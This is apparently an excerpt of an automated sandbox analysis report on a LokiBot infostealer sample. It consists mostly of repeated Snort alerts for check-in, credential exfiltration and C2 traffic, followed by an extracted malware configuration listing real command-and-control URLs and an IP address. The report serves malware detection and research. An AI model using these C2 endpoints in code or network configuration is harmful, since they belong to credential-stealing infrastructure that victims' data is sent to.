Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:39.893817
SID:	2025381
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:21.613500
SID:	2024313
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:47.670237
SID:	2021641
Source Port:	49771
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:34.068335
SID:	2024313
Source Port:	49802
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:04.426692
SID:	2024312
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:21.613500
SID:	2024318
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:04.288590
SID:	2024318
Source Port:	49783
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:04.288590
SID:	2024313
Source Port:	49783
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:34.068335
SID:	2024318
Source Port:	49802
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:04.426692
SID:	2024317
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:29.146660
SID:	2021641
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:41.435996
SID:	2024313
Source Port:	49806
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:05.708325
SID:	2025381
Source Port:	49784
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:08.768305
SID:	2024318
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:02.891159
SID:	2024318
Source Port:	49782
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:02.891159
SID:	2024313
Source Port:	49782
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:52.043341
SID:	2021641
Source Port:	49813
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:08.768305
SID:	2024313
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:47.482327
SID:	2025381
Source Port:	49810
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:19.056808
SID:	2021641
Source Port:	49793
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:27.753457
SID:	2024313
Source Port:	49799
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:30.595490
SID:	2025381
Source Port:	49801
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:20.496255
SID:	2025381
Source Port:	49794
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:27.753457
SID:	2024318
Source Port:	49799
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:50.432496
SID:	2024318
Source Port:	49812
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:24.904349
SID:	2025381
Source Port:	49797
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:23.393350
SID:	2021641
Source Port:	49796
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:38.519329
SID:	2025381
Source Port:	49804
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:50.432496
SID:	2024313
Source Port:	49812
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:10.461205
SID:	2021641
Source Port:	49787
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:11.850756
SID:	2025381
Source Port:	49788
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:41.435996
SID:	2024318
Source Port:	49806
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:30.890483
SID:	2024318
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:35.596260
SID:	2021641
Source Port:	49803
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:30.890483
SID:	2024313
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:29.172203
SID:	2021641
Source Port:	49800
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:52.847994
SID:	2021641
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:44.797094
SID:	2025381
Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:05.836233
SID:	2024318
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:15.814851
SID:	2024313
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:08.959356
SID:	2024313
Source Port:	49786
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:07.242464
SID:	2025381
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:54.249806
SID:	2025381
Source Port:	49775
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:43.312556
SID:	2021641
Source Port:	49768
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:00.052049
SID:	2021641
Source Port:	49780
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:08.959356
SID:	2024318
Source Port:	49786
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:17.632927
SID:	2024313
Source Port:	49792
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:15.814851
SID:	2024318
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:17.632927
SID:	2024318
Source Port:	49792
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:45.956580
SID:	2024313
Source Port:	49809
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:45.956580
SID:	2024318
Source Port:	49809
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://kbfvzoboss.bid/alien/fre.php	URL Reputation: Label: malware
Source: http://alphastand.top/alien/fre.php	URL Reputation: Label: malware
Source: http://alphastand.win/alien/fre.php	URL Reputation: Label: malware
Source: http://alphastand.trade/alien/fre.php	URL Reputation: Label: malware

Found malware configuration

Source: 00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://45.77.223.48/~blog/?ajax=posts.php"]}

Machine Learning detection for sample

Source: SCB#89940578.exe

Joe Sandbox ML: detected

Source: SCB#89940578.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: SCB#89940578.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\SCB#89940578.exe

Code function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

2_2_00403D74

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49735 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49735 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49735 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49735 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49736 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49736 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49736 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49736 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49739 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49739 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49739 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49739 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49740 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49740 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49740 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49740 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49741 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49741 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49741 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49741 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49742 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49742 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49742 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49742 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49743 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49743 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49743 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49743 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49744 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49744 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49744 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49744 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49745 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49745 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49745 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49745 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49747 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49747 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49747 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49747 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49750 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49750 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49750 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49750 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49753 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49753 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49753 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49753 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49754 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49754 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49754 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49754 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49755 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49755 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49755 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49755 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49756 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49756 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49756 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49756 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49757 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49757 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49757 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49757 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49758 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49758 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49758 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49758 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49759 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49759 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49759 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49759 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49760 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49760 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49760 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49760 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49761 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49761 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49761 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49761 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49762 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49762 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49762 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49762 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49763 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49763 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49763 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49763 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49764 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49764 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49764 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49764 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49765 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49765 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49765 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49765 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49766 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49766 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49766 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49766 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49767 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49767 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49767 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49767 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49768 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49768 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49768 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49768 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49769 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49769 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49769 -> 45.77.223.48:80
